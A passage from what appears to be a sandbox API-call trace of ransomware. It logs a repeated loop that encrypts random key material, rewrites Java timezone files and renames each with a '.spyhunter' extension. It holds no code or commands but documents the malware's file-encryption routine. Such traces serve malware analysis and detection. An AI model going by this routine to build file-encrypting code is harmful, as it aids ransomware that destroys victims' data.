dwLen=0x20, pbBuffer=0x25ce580 | out: pbBuffer=0x25ce580) returned 1 [0167.858] GetProcessHeap () returned 0x2c0000 [0167.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.858] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce578*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce578*=0x30) returned 1 [0167.858] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\maldives"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.859] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives") returned 59 [0167.859] StrStrW (lpFirst="Maldives", lpSrch=".txt") returned 0x0 [0167.859] GetProcessHeap () returned 0x2c0000 [0167.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.859] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce53c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce53c*=0x41, lpOverlapped=0x0) returned 1 [0167.859] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.860] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25ce53c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce53c*=0x41, lpOverlapped=0x0) returned 1 [0167.860] GetProcessHeap () returned 0x2c0000 [0167.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.860] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.860] WriteFile (in: hFile=0x178, lpBuffer=0x25ce57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce53c, lpOverlapped=0x0 | out: lpBuffer=0x25ce57c*, lpNumberOfBytesWritten=0x25ce53c*=0x4, lpOverlapped=0x0) returned 1 [0167.860] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce53c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce53c*=0x30, lpOverlapped=0x0) returned 1 [0167.860] CloseHandle (hObject=0x178) returned 1 [0167.860] GetProcessHeap () returned 0x2c0000 [0167.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.861] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives.spyhunter") returned 69 [0167.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\maldives"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\maldives.spyhunter")) returned 1 [0167.862] GetProcessHeap () returned 0x2c0000 [0167.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.862] GetProcessHeap () returned 0x2c0000 [0167.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.862] GetProcessHeap () returned 0x2c0000 [0167.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3100 | out: hHeap=0x2c0000) returned 1 [0167.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce578 | out: pbBuffer=0x25ce578) returned 1 [0167.862] GetProcessHeap () returned 0x2c0000 [0167.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.862] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce570*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce570*=0x30) returned 1 [0167.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mahe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.863] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe") returned 55 [0167.863] StrStrW (lpFirst="Mahe", lpSrch=".txt") returned 0x0 [0167.863] GetProcessHeap () returned 0x2c0000 [0167.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.864] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce534, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce534*=0x41, lpOverlapped=0x0) returned 1 [0167.864] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.864] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25ce534, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce534*=0x41, lpOverlapped=0x0) returned 1 [0167.865] GetProcessHeap () returned 0x2c0000 [0167.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.865] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.865] WriteFile (in: hFile=0x178, lpBuffer=0x25ce574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce534, lpOverlapped=0x0 | out: lpBuffer=0x25ce574*, lpNumberOfBytesWritten=0x25ce534*=0x4, lpOverlapped=0x0) returned 1 [0167.865] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce534, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce534*=0x30, lpOverlapped=0x0) returned 1 [0167.865] CloseHandle (hObject=0x178) returned 1 [0167.865] GetProcessHeap () returned 0x2c0000 [0167.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.865] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe.spyhunter") returned 65 [0167.865] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mahe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mahe.spyhunter")) returned 1 [0167.866] GetProcessHeap () returned 0x2c0000 [0167.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.866] GetProcessHeap () returned 0x2c0000 [0167.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.866] GetProcessHeap () returned 0x2c0000 [0167.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0958 | out: hHeap=0x2c0000) returned 1 [0167.867] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce578 | out: pbBuffer=0x25ce578) returned 1 [0167.867] GetProcessHeap () returned 0x2c0000 [0167.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.867] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce570*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce570*=0x30) returned 1 [0167.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\kerguelen"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.868] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen") returned 60 [0167.868] StrStrW (lpFirst="Kerguelen", lpSrch=".txt") returned 0x0 [0167.868] GetProcessHeap () returned 0x2c0000 [0167.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.868] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce534, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce534*=0x41, lpOverlapped=0x0) returned 1 [0167.869] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.869] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25ce534, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce534*=0x41, lpOverlapped=0x0) returned 1 [0167.869] GetProcessHeap () returned 0x2c0000 [0167.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.870] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.870] WriteFile (in: hFile=0x178, lpBuffer=0x25ce574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce534, lpOverlapped=0x0 | out: lpBuffer=0x25ce574*, lpNumberOfBytesWritten=0x25ce534*=0x4, lpOverlapped=0x0) returned 1 [0167.870] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce534, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce534*=0x30, lpOverlapped=0x0) returned 1 [0167.870] CloseHandle (hObject=0x178) returned 1 [0167.870] GetProcessHeap () returned 0x2c0000 [0167.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.870] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen.spyhunter") returned 70 [0167.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\kerguelen"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\kerguelen.spyhunter")) returned 1 [0167.871] GetProcessHeap () returned 0x2c0000 [0167.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.871] GetProcessHeap () returned 0x2c0000 [0167.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.871] GetProcessHeap () returned 0x2c0000 [0167.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4b28 | out: hHeap=0x2c0000) returned 1 [0167.871] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce570 | out: pbBuffer=0x25ce570) returned 1 [0167.871] GetProcessHeap () returned 0x2c0000 [0167.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.871] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce568*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce568*=0x30) returned 1 [0167.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\comoro"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.872] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro") returned 57 [0167.872] StrStrW (lpFirst="Comoro", lpSrch=".txt") returned 0x0 [0167.872] GetProcessHeap () returned 0x2c0000 [0167.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.872] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce52c*=0x41, lpOverlapped=0x0) returned 1 [0167.873] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.873] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25ce52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce52c*=0x41, lpOverlapped=0x0) returned 1 [0167.873] GetProcessHeap () returned 0x2c0000 [0167.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.874] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.874] WriteFile (in: hFile=0x178, lpBuffer=0x25ce56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce52c, lpOverlapped=0x0 | out: lpBuffer=0x25ce56c*, lpNumberOfBytesWritten=0x25ce52c*=0x4, lpOverlapped=0x0) returned 1 [0167.874] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce52c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce52c*=0x30, lpOverlapped=0x0) returned 1 [0167.874] CloseHandle (hObject=0x178) returned 1 [0167.874] GetProcessHeap () returned 0x2c0000 [0167.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.874] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro.spyhunter") returned 67 [0167.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\comoro"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\comoro.spyhunter")) returned 1 [0167.875] GetProcessHeap () returned 0x2c0000 [0167.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.875] GetProcessHeap () returned 0x2c0000 [0167.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.875] GetProcessHeap () returned 0x2c0000 [0167.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3040 | out: hHeap=0x2c0000) returned 1 [0167.875] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce570 | out: pbBuffer=0x25ce570) returned 1 [0167.875] GetProcessHeap () returned 0x2c0000 [0167.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.875] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce568*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce568*=0x30) returned 1 [0167.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\cocos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.876] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos") returned 56 [0167.876] StrStrW (lpFirst="Cocos", lpSrch=".txt") returned 0x0 [0167.876] GetProcessHeap () returned 0x2c0000 [0167.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.876] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce52c*=0x1b, lpOverlapped=0x0) returned 1 [0167.877] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.877] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce52c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce52c*=0x1b, lpOverlapped=0x0) returned 1 [0167.878] GetProcessHeap () returned 0x2c0000 [0167.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.878] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.878] WriteFile (in: hFile=0x178, lpBuffer=0x25ce56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce52c, lpOverlapped=0x0 | out: lpBuffer=0x25ce56c*, lpNumberOfBytesWritten=0x25ce52c*=0x4, lpOverlapped=0x0) returned 1 [0167.878] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce52c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce52c*=0x30, lpOverlapped=0x0) returned 1 [0167.878] CloseHandle (hObject=0x178) returned 1 [0167.878] GetProcessHeap () returned 0x2c0000 [0167.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.878] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos.spyhunter") returned 66 [0167.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\cocos"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\cocos.spyhunter")) returned 1 [0167.879] GetProcessHeap () returned 0x2c0000 [0167.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.879] GetProcessHeap () returned 0x2c0000 [0167.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.879] GetProcessHeap () returned 0x2c0000 [0167.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2f80 | out: hHeap=0x2c0000) returned 1 [0167.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce568 | out: pbBuffer=0x25ce568) returned 1 [0167.880] GetProcessHeap () returned 0x2c0000 [0167.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.880] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce560*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce560*=0x30) returned 1 [0167.880] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\christmas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.881] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas") returned 60 [0167.881] StrStrW (lpFirst="Christmas", lpSrch=".txt") returned 0x0 [0167.881] GetProcessHeap () returned 0x2c0000 [0167.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.881] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce524*=0x1b, lpOverlapped=0x0) returned 1 [0167.882] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.882] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce524*=0x1b, lpOverlapped=0x0) returned 1 [0167.882] GetProcessHeap () returned 0x2c0000 [0167.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.882] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.882] WriteFile (in: hFile=0x178, lpBuffer=0x25ce564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce524, lpOverlapped=0x0 | out: lpBuffer=0x25ce564*, lpNumberOfBytesWritten=0x25ce524*=0x4, lpOverlapped=0x0) returned 1 [0167.882] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce524, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce524*=0x30, lpOverlapped=0x0) returned 1 [0167.882] CloseHandle (hObject=0x178) returned 1 [0167.882] GetProcessHeap () returned 0x2c0000 [0167.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.883] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas.spyhunter") returned 70 [0167.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\christmas"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\christmas.spyhunter")) returned 1 [0167.883] GetProcessHeap () returned 0x2c0000 [0167.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.884] GetProcessHeap () returned 0x2c0000 [0167.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.884] GetProcessHeap () returned 0x2c0000 [0167.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb240 | out: hHeap=0x2c0000) returned 1 [0167.884] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce568 | out: pbBuffer=0x25ce568) returned 1 [0167.884] GetProcessHeap () returned 0x2c0000 [0167.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.884] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce560*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce560*=0x30) returned 1 [0167.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\chagos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.885] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos") returned 57 [0167.885] StrStrW (lpFirst="Chagos", lpSrch=".txt") returned 0x0 [0167.885] GetProcessHeap () returned 0x2c0000 [0167.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.885] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce524*=0x4d, lpOverlapped=0x0) returned 1 [0167.886] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.886] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x25ce524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce524*=0x4d, lpOverlapped=0x0) returned 1 [0167.886] GetProcessHeap () returned 0x2c0000 [0167.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.886] SetFilePointerEx (in: 